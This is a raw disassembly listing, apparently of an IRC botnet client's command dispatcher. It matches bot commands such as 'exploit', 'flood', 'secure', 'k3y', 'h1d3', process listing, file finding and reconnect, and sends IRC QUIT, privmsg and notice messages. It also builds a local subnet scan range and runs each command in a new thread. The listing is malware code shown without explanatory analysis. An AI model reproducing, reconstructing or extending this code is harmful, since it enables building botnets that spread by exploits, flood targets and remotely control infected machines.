call sub_40B9D6
test eax, eax
pop ecx
jle short loc_4042F0
cmp [ebp+var_8], ebx
jnz loc_402166
push ebx ; int
push [ebp+var_4] ; int
push offset unk_441B90 ; int
loc_4042DD: ; CODE XREF: sub_401CC7+51B8�j
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
jmp loc_409055
; ---------------------------------------------------------------------------
loc_4042F0: ; CODE XREF: sub_401CC7+2602�j
push [ebp+Format] ; Format
lea eax, [ebp+var_B2C]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
mov esi, dword ptr [ebp+esi+Args]
mov [ebp+var_B30], eax
mov eax, [ebp+var_4]
mov [ebp+var_AA4], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_AA0], eax
mov [ebp+var_AA8], ebx
jz short loc_404351
push esi ; Str2
push offset aFull ; "full"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404351
mov [ebp+var_AA8], 1
loc_404351: ; CODE XREF: sub_401CC7+266D�j
; sub_401CC7+267E�j
lea eax, [ebp+Dst]
push offset asc_441BB8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 27h ; int
push eax ; Source
call sub_40B78E
add esp, 14h
mov [ebp+var_AAC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_B30]
push ebx
push eax
push offset sub_41A804
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_AAC]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_4043BF
loc_4043A9: ; CODE XREF: sub_401CC7+26F6�j
cmp [ebp+var_A9C], ebx
jnz loc_4041D2
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_4043A9
; ---------------------------------------------------------------------------
loc_4043BF: ; CODE XREF: sub_401CC7+26E0�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dst]
push offset asc_441BD4 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_4041D2
; ---------------------------------------------------------------------------
loc_4043DF: ; CODE XREF: sub_401CC7+17BE�j
; sub_401CC7+17D3�j
cmp [ebp+var_8], ebx
jnz short loc_4043FE
push ebx ; int
push [ebp+var_4] ; int
push offset dword_441B68 ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 14h
loc_4043FE: ; CODE XREF: sub_401CC7+271B�j
push [ebp+arg_4]
call dword_4E42B8 ; closesocket
call dword_4E4178 ; WSACleanup
call sub_41912E
push ebx
call ds:dword_4F636C ; ExitProcess
loc_404419: ; CODE XREF: sub_401CC7+1794�j
; sub_401CC7+17A9�j
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push [ebp+arg_4]
push eax
call sub_41B964
pop ecx
pop ecx
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
push offset dword_441B40
jmp short loc_404471
; ---------------------------------------------------------------------------
loc_404444: ; CODE XREF: sub_401CC7+176A�j
; sub_401CC7+177F�j
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_41BC18
add esp, 0Ch
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
push offset dword_441B18
loc_404471: ; CODE XREF: sub_401CC7+24A3�j
; sub_401CC7+277B�j
call sub_415C77
add esp, 18h
jmp loc_409B47
; ---------------------------------------------------------------------------
loc_40447E: ; CODE XREF: sub_401CC7+1740�j
; sub_401CC7+1755�j
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_415DB4
loc_404492: ; CODE XREF: sub_401CC7+3BF�j
; sub_401CC7+2530�j ...
add esp, 10h
jmp loc_402166
; ---------------------------------------------------------------------------
loc_40449A: ; CODE XREF: sub_401CC7+1716�j
; sub_401CC7+172B�j
cmp [ebp+var_C], ebx
mov [ebp+var_1594], bl
jz short loc_4044D9
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_4044D9
push esi ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4044D9
push eax
push offset aS_37 ; "%s"
lea eax, [ebp+var_1594]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
loc_4044D9: ; CODE XREF: sub_401CC7+27DC�j
; sub_401CC7+27E7�j ...
push [ebp+Format] ; Format
lea eax, [ebp+var_1614]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_1618], eax
mov eax, [ebp+var_4]
mov [ebp+var_1510], eax
mov eax, [ebp+var_8]
mov [ebp+var_150C], eax
lea eax, [ebp+Dst]
push offset asc_441AAC ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 25h ; int
push eax ; Source
call sub_40B78E
add esp, 14h
mov [ebp+var_1514], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1618]
push ebx
push eax
push offset sub_415E27
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_1514]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_40457C
loc_404566: ; CODE XREF: sub_401CC7+28B3�j
cmp [ebp+var_1508], ebx
jnz loc_402166
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_404566
; ---------------------------------------------------------------------------
loc_40457C: ; CODE XREF: sub_401CC7+289D�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_441AC4
jmp loc_409CCE
; ---------------------------------------------------------------------------
loc_40458D: ; CODE XREF: sub_401CC7+16EC�j
; sub_401CC7+1701�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_415BFF
push offset dword_441A88
call sub_415C77
loc_4045A8: ; CODE XREF: sub_401CC7+2413�j
add esp, 10h
jmp loc_409B47
; ---------------------------------------------------------------------------
loc_4045B0: ; CODE XREF: sub_401CC7+16C2�j
; sub_401CC7+16D7�j
push [ebp+Format] ; Format
lea eax, [ebp+var_BC4]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
mov esi, dword ptr [ebp+esi+Args]
mov [ebp+var_BC8], eax
mov eax, [ebp+var_4]
mov [ebp+var_B3C], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_B38], eax
jz short loc_40460A
push offset aSub ; "sub"
push esi ; Str1
call _strcmp
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+var_B40], eax
jmp short loc_404610
; ---------------------------------------------------------------------------
loc_40460A: ; CODE XREF: sub_401CC7+2927�j
mov [ebp+var_B40], ebx
loc_404610: ; CODE XREF: sub_401CC7+2941�j
lea eax, [ebp+Dst]
push offset asc_441A20 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 28h ; int
push eax ; Source
call sub_40B78E
add esp, 14h
mov [ebp+var_B44], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_BC8]
push ebx
push eax
push offset sub_40B7F9
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_B44]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_40467E
loc_404668: ; CODE XREF: sub_401CC7+29B5�j
cmp [ebp+var_B34], ebx
jnz loc_407049
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_404668
; ---------------------------------------------------------------------------
loc_40467E: ; CODE XREF: sub_401CC7+299F�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_441A40
jmp loc_409575
; ---------------------------------------------------------------------------
loc_40468F: ; CODE XREF: sub_401CC7+1646�j
; sub_401CC7+165B�j
push offset aK3y ; "k3y"
push offset asc_4419A8 ; "-"
loc_404699: ; CODE XREF: sub_401CC7+2A11�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 20h
jmp loc_407049
; ---------------------------------------------------------------------------
loc_4046C6: ; CODE XREF: sub_401CC7+161C�j
; sub_401CC7+1631�j
push dword_4E3F2C
call sub_41B7A7
pop ecx
push eax
push offset unk_441974
jmp short loc_404699
; ---------------------------------------------------------------------------
loc_4046DA: ; CODE XREF: sub_401CC7+15F2�j
; sub_401CC7+1607�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_40470C
cmp [ebp+var_C], ebx
jz short loc_40471B
push esi ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40471B
push eax ; Args
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4] ; int
call sub_409D26
add esp, 0Ch
jmp short loc_40471B
; ---------------------------------------------------------------------------
loc_40470C: ; CODE XREF: sub_401CC7+2A1C�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4] ; int
call sub_409D26
pop ecx
pop ecx
loc_40471B: ; CODE XREF: sub_401CC7+2A21�j
; sub_401CC7+2A30�j ...
push 0FFFFFFFEh
jmp loc_402168
; ---------------------------------------------------------------------------
loc_404722: ; CODE XREF: sub_401CC7+15C8�j
; sub_401CC7+15DD�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4] ; int
call sub_409D26
push offset dword_441924
call sub_415C77
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_402169
; ---------------------------------------------------------------------------
loc_404744: ; CODE XREF: sub_401CC7+159E�j
; sub_401CC7+15B3�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4] ; int
call sub_409D26
push offset dword_4418E0
call sub_415C77
add esp, 0Ch
jmp loc_409AB0
; ---------------------------------------------------------------------------
loc_404763: ; CODE XREF: sub_401CC7+1574�j
; sub_401CC7+1589�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40BE72
jmp loc_404B36
; ---------------------------------------------------------------------------
loc_404779: ; CODE XREF: sub_401CC7+154A�j
; sub_401CC7+155F�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40BE1D
jmp loc_404B36
; ---------------------------------------------------------------------------
loc_40478F: ; CODE XREF: sub_401CC7+1520�j
; sub_401CC7+1535�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40BDB1
jmp loc_404B36
; ---------------------------------------------------------------------------
loc_4047A5: ; CODE XREF: sub_401CC7+14F6�j
; sub_401CC7+150B�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40BCE2
jmp loc_404B36
; ---------------------------------------------------------------------------
loc_4047BB: ; CODE XREF: sub_401CC7+1451�j
; sub_401CC7+1466�j
push dword ptr [ebp+esi+Args]
push 27h
push offset aProcessList ; "Process list"
push offset dword_4417E4
jmp short loc_4047E3
; ---------------------------------------------------------------------------
loc_4047D0: ; CODE XREF: sub_401CC7+1427�j
; sub_401CC7+143C�j
push dword ptr [ebp+esi+Args] ; Str
push 24h ; int
push offset aFindFile ; "Find file"
push offset dword_4417B0 ; int
loc_4047E3: ; CODE XREF: sub_401CC7+102C�j
; sub_401CC7+107F�j ...
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+Format] ; int
push [ebp+arg_4] ; int
call sub_40BA1C
add esp, 20h
jmp loc_402166
; ---------------------------------------------------------------------------
loc_4047FF: ; CODE XREF: sub_401CC7+1040�j
; sub_401CC7+1055�j
mov edi, dword ptr [ebp+esi+Args]
cmp edi, ebx
jz short loc_40481E
push edi ; Str
call _atoi
test eax, eax
pop ecx
jz short loc_40481E
push edi ; Str
call _atoi
pop ecx
jmp short loc_404823
; ---------------------------------------------------------------------------
loc_40481E: ; CODE XREF: sub_401CC7+2B41�j
; sub_401CC7+2B4C�j
mov eax, dword_440074
loc_404823: ; CODE XREF: sub_401CC7+2B55�j
mov esi, [ebp+esi+Format]
mov [ebp+var_590], eax
cmp esi, ebx
jz short loc_404848
push esi ; Format
loc_404835: ; CODE XREF: sub_401CC7+2B90�j
lea eax, [ebp+var_5A0]
push 10h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_40485F
; ---------------------------------------------------------------------------
loc_404848: ; CODE XREF: sub_401CC7+2B6B�j
cmp [ebp+var_8FF], bl
jz short loc_404859
lea eax, [ebp+var_C0]
push eax
jmp short loc_404835
; ---------------------------------------------------------------------------
loc_404859: ; CODE XREF: sub_401CC7+2B87�j
mov [ebp+var_5A0], bl
loc_40485F: ; CODE XREF: sub_401CC7+2B7F�j
mov eax, [ebp+var_4]
push [ebp+Format] ; Format
mov esi, [ebp+arg_4]
mov [ebp+var_584], eax
mov eax, [ebp+var_8]
push 80h ; Count
mov [ebp+var_580], eax
lea eax, [ebp+var_620]
push eax ; Dest
mov [ebp+var_624], esi
call __snprintf
add esp, 0Ch
push [ebp+var_590]
push esi
call sub_40AFA9
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_4413B4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 19h ; int
push eax ; Source
call sub_40B78E
add esp, 1Ch
mov [ebp+var_58C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_624]
push ebx
push eax
push offset sub_411C86
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_58C]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_404910
loc_4048FA: ; CODE XREF: sub_401CC7+2C47�j
cmp [ebp+var_57C], ebx
jnz loc_402166
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_4048FA
; ---------------------------------------------------------------------------
loc_404910: ; CODE XREF: sub_401CC7+2C31�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset dword_4413DC
jmp loc_409CCE
; ---------------------------------------------------------------------------
loc_404921: ; CODE XREF: sub_401CC7+FED�j
; sub_401CC7+1002�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_404941
push esi ; Str
call _atoi
test ax, ax
pop ecx
jz short loc_404941
push esi ; Str
call _atoi
pop ecx
jmp short loc_404947
; ---------------------------------------------------------------------------
loc_404941: ; CODE XREF: sub_401CC7+2C63�j
; sub_401CC7+2C6F�j
mov ax, word_440084
loc_404947: ; CODE XREF: sub_401CC7+2C78�j
push [ebp+Format] ; Format
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
mov [ebp+var_97C], ax
mov eax, [ebp+var_8]
push 80h ; Count
mov [ebp+var_96C], eax
lea eax, [ebp+var_9FC]
push eax ; Dest
mov [ebp+var_A00], esi
mov [ebp+var_970], edi
call __snprintf
movzx eax, [ebp+var_97C]
add esp, 0Ch
push eax
push esi
call sub_40AFA9
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_441310 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push edi ; int
push eax ; int
push [ebp+Format] ; Str
push esi ; int
call sub_409D6C
push ebx ; int
lea eax, [ebp+Dst]
push 6 ; int
push eax ; Source
call sub_40B78E
add esp, 30h
mov [ebp+var_978], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A00]
push ebx
push eax
push offset sub_40EFAC
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_978]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_404A16
loc_404A00: ; CODE XREF: sub_401CC7+2D4D�j
cmp [ebp+var_968], ebx
jnz loc_402166
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_404A00
; ---------------------------------------------------------------------------
loc_404A16: ; CODE XREF: sub_401CC7+2D37�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_44133C
jmp loc_409CCE
; ---------------------------------------------------------------------------
loc_404A27: ; CODE XREF: sub_401CC7+F99�j
; sub_401CC7+FAE�j ...
push edi ; Str2
push offset aSecure_1 ; "secure"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_404A4F
push edi ; Str2
push offset aSec_0 ; "sec"
call _strcmp
pop ecx
mov [ebp+var_A10], ebx
test eax, eax
pop ecx
jnz short loc_404A59
loc_404A4F: ; CODE XREF: sub_401CC7+2D6F�j
mov [ebp+var_A10], 1
loc_404A59: ; CODE XREF: sub_401CC7+2D86�j
push [ebp+Format] ; Format
lea eax, [ebp+var_A94]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
add esp, 0Ch
cmp [ebp+var_A10], ebx
mov [ebp+var_A98], eax
mov eax, [ebp+var_4]
mov [ebp+var_A0C], eax
mov eax, [ebp+var_8]
mov [ebp+var_A08], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_404AA0
mov eax, offset aUnsecuring ; "Unsecuring"
loc_404AA0: ; CODE XREF: sub_401CC7+2DD2�j
push eax
push offset asc_4412A8 ; "-"
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 22h ; int
push eax ; Source
call sub_40B78E
add esp, 1Ch
mov [ebp+var_A14], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A98]
push ebx
push eax
push offset sub_41AD35
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_A14]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_404B14
loc_404AFE: ; CODE XREF: sub_401CC7+2E4B�j
cmp [ebp+var_A04], ebx
jnz loc_408708
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_404AFE
; ---------------------------------------------------------------------------
loc_404B14: ; CODE XREF: sub_401CC7+2E35�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset dword_4412C4
jmp loc_4086F9
; ---------------------------------------------------------------------------
loc_404B25: ; CODE XREF: sub_401CC7+F6F�j
; sub_401CC7+F84�j
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_41B5CA
loc_404B36: ; CODE XREF: sub_401CC7+2AAD�j
; sub_401CC7+2AC3�j ...
add esp, 0Ch
jmp loc_409B47
; ---------------------------------------------------------------------------
loc_404B3E: ; CODE XREF: sub_401CC7+F45�j
; sub_401CC7+F5A�j
push offset unk_4411A4
jmp loc_40891F
; ---------------------------------------------------------------------------
loc_404B48: ; CODE XREF: sub_401CC7+F1B�j
; sub_401CC7+F30�j
push offset aH1d3 ; "h1d3"
push offset dword_441184
jmp loc_407019
; ---------------------------------------------------------------------------
loc_404B57: ; CODE XREF: sub_401CC7+EF1�j
; sub_401CC7+F06�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_404BB1
push esi ; Str
call _atoi
cmp eax, ebx
pop ecx
jl short loc_404BA9
cmp eax, 3
jge short loc_404BA9
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
cmp [ecx+edx], bl
lea esi, [ecx+edx]
jz short loc_404BA1
lea eax, [esi+1]
push eax
lea eax, [ebp+Dst]
push offset asc_4410E0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
mov [esi], bl
jmp loc_4085D7
; ---------------------------------------------------------------------------
loc_404BA1: ; CODE XREF: sub_401CC7+2EB9�j
push eax
push offset unk_441100
jmp short loc_404BEE
; ---------------------------------------------------------------------------
loc_404BA9: ; CODE XREF: sub_401CC7+2EA4�j
; sub_401CC7+2EA9�j
push eax
push offset unk_44112C
jmp short loc_404BEE
; ---------------------------------------------------------------------------
loc_404BB1: ; CODE XREF: sub_401CC7+2E99�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_404BB6: ; CODE XREF: sub_401CC7+2F0B�j
push [ebp+var_90] ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_404BD9
inc esi
add edi, 80h
cmp esi, 3
jl short loc_404BB6
jmp loc_4085D7
; ---------------------------------------------------------------------------
loc_404BD9: ; CODE XREF: sub_401CC7+2EFF�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C0]
push eax
push offset asc_441158 ; "-"
loc_404BEE: ; CODE XREF: sub_401CC7+2112�j
; sub_401CC7+2EE0�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
jmp loc_4085D4
; ---------------------------------------------------------------------------
loc_404BFF: ; CODE XREF: sub_401CC7+EC7�j
; sub_401CC7+EDC�j
push dword ptr [ebp+Args] ; Str2
push offset a332_4 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40365A
call sub_40B957
push ebx
call ds:dword_4F636C ; ExitProcess
loc_404C25: ; CODE XREF: sub_401CC7+19CB�j
push offset aGet_2 ; "get"
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_404CBC
cmp dword_4E7A18, ebx
jz short loc_404C51
push offset byte_4E73F8
push offset unk_4422C8
jmp loc_404CEC
; ---------------------------------------------------------------------------
loc_404C51: ; CODE XREF: sub_401CC7+2F79�j
push 10h
pop eax
mov [ebp+var_2D0], eax
push eax ; Size
lea eax, [ebp+var_2E8]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_2D0]
push eax
lea eax, [ebp+var_2E8]
push eax
push [ebp+arg_4]
call ds:dword_4F6580 ; getsockname
movzx eax, [ebp+var_2E2]
push eax
movzx eax, [ebp+var_2E3]
push eax
movzx eax, [ebp+var_2E4]
push eax
lea eax, [ebp+var_E30]
push offset aD_D_D_ ; "%d.%d.%d.*"
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+var_E30]
push eax
push offset unk_44230C
jmp short loc_404CEC
; ---------------------------------------------------------------------------
loc_404CBC: ; CODE XREF: sub_401CC7+2F6D�j
push edi
call dword_4E4260 ; inet_addr
cmp eax, 0FFFFFFFFh
push edi ; Source
jnz short loc_404CD0
push offset unk_442344
jmp short loc_404CEC
; ---------------------------------------------------------------------------
loc_404CD0: ; CODE XREF: sub_401CC7+3000�j
push offset byte_4E73F8 ; Dest
call _strcpy
pop ecx
mov dword_4E7A18, 1
pop ecx
push edi
push offset asc_442378 ; "-"
loc_404CEC: ; CODE XREF: sub_401CC7+2F85�j
; sub_401CC7+2FF3�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_4036B1
; ---------------------------------------------------------------------------
loc_404D00: ; CODE XREF: sub_401CC7+19B6�j
push [ebp+arg_8] ; Str2
push offset aExploit ; "exploit"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_404E06
mov eax, [ebp+var_4]
mov esi, 80h
mov [ebp+var_13E4], eax
mov eax, [ebp+var_8]
mov [ebp+var_13E0], eax
mov eax, [ebp+arg_4]
mov [ebp+var_13F4], eax
push offset aHelp ; "##help"
lea eax, [ebp+var_1474]
push esi ; Count
push eax ; Dest
mov [ebp+var_13EC], 1
call __snprintf
add esp, 0Ch
lea eax, [ebp+var_14F4]
push offset aHelp ; "##help"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+var_1504]
push edi ; Format
push 10h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+var_1504]
push eax
lea eax, [ebp+Dst]
push offset asc_4423AC ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 8 ; int
push eax ; Source
call sub_40B78E
add esp, 18h
mov [ebp+var_13E8], eax
lea eax, [ebp+var_2FC]
push eax
lea eax, [ebp+var_1504]
push ebx
push eax
push offset sub_40BF39
push ebx
push ebx
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_13E8]
imul ecx, 234h
cmp eax, ebx
mov dword_45713C[ecx], eax
jz short loc_404DF5
loc_404DDF: ; CODE XREF: sub_401CC7+312C�j
cmp [ebp+var_13DC], ebx
jnz loc_4085D7
push 32h
call ds:dword_4F6380 ; Sleep
jmp short loc_404DDF
; ---------------------------------------------------------------------------
loc_404DF5: ; CODE XREF: sub_401CC7+3116�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
push offset unk_4423DC
jmp loc_404BEE
; ---------------------------------------------------------------------------
loc_404E06: ; CODE XREF: sub_401CC7+304A�j
push [ebp+arg_8] ; Str2
push offset aReconnect_in ; "reconnect.in"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409AB7
push [ebp+arg_8] ; Str2
push offset aRin ; "rin"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409AB7
push [ebp+arg_8] ; Str2
push offset aReconnect_in_m ; "reconnect.in.ms"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409A73
push [ebp+arg_8] ; Str2
push offset aRinms ; "rinms"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409A73
push [ebp+arg_8] ; Str2
push offset aFlood ; "flood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_405A0C
call ds:dword_4F63B0 ; GetTickCount
push eax ; Seed
call _srand
push edi ; Str2
push offset aLoad ; "load"
call _strcmp
add esp, 0Ch
test eax, eax
jnz short loc_404F0C
cmp [ebp+esi+var_80], ebx
jz short loc_404F0C
push [ebp+esi+var_80] ; Str
call _atoi
pop ecx
push eax ; int
push [ebp+esi+Str2] ; Str
call _atoi
pop ecx
push eax ; int
push [ebp+esi+Format] ; Source
call sub_41860A
add esp, 0Ch
lea eax, [ebp+Dst]
push [ebp+esi+Str2]
push [ebp+esi+Format]
push [ebp+esi+var_80]
push offset asc_4424D4 ; "-"
push eax ; Dest
call _sprintf
add esp, 14h
cmp [ebp+var_8], ebx
jnz short loc_404F0C
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 14h
loc_404F0C: ; CODE XREF: sub_401CC7+31CE�j
; sub_401CC7+31D4�j ...
push edi ; Str2
push offset aPm_1 ; "pm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404F76
mov eax, [ebp+esi+Str2]
cmp eax, ebx
jz short loc_404F76
push offset asc_442504 ; " "
push offset a__7 ; "_"
push eax ; Src
call sub_418C3F
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strcpy
add esp, 14h
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
loc_404F76: ; CODE XREF: sub_401CC7+3254�j
; sub_401CC7+325F�j
push edi ; Str2
push offset aCt ; "ct"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404FE0
mov eax, [ebp+esi+Str2]
cmp eax, ebx
jz short loc_404FE0
push offset asc_442520 ; " "
push offset a_ ; "_"
push eax ; Src
call sub_418C3F
push eax ; Source
lea eax, [ebp+var_4BF0]
push eax ; Dest
call _strcpy
add esp, 14h
lea eax, [ebp+var_4BF0]
push eax
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aPrivmsgS ; "privmsg %s :"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
loc_404FE0: ; CODE XREF: sub_401CC7+32BE�j
; sub_401CC7+32C9�j
push edi ; Str2
push offset aNt_1 ; "nt"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40504A
mov eax, [ebp+esi+Str2]
cmp eax, ebx
jz short loc_40504A
push offset asc_442540 ; " "
push offset a__8 ; "_"
push eax ; Src
call sub_418C3F
push eax ; Source
lea eax, [ebp+var_46EC]
push eax ; Dest
call _strcpy
add esp, 14h
lea eax, [ebp+var_46EC]
push eax
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aNoticeSS_1 ; "notice %s :%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
loc_40504A: ; CODE XREF: sub_401CC7+3328�j
; sub_401CC7+3333�j
push edi ; Str2
push offset aMode ; "mode"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4050B4
mov eax, [ebp+esi+Str2]
cmp eax, ebx
jz short loc_4050B4
push offset asc_442560 ; " "
push offset a__0 ; "_"
push eax ; Src
call sub_418C3F
push eax ; Source
lea eax, [ebp+var_4DF0]
push eax ; Dest
call _strcpy
add esp, 14h
lea eax, [ebp+var_4DF0]
push eax
lea eax, [ebp+Dst]
push [ebp+esi+Format]
push offset aModeSS ; "mode %s %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 14h
loc_4050B4: ; CODE XREF: sub_401CC7+3392�j
; sub_401CC7+339D�j
push edi ; Str2
push offset aJoin ; "join"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4050F1
mov eax, [ebp+esi+Format]
cmp eax, ebx
jz short loc_4050F1
push eax
lea eax, [ebp+Dst]
push offset aJoinS ; "join %s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Dest
call sub_418331
add esp, 10h
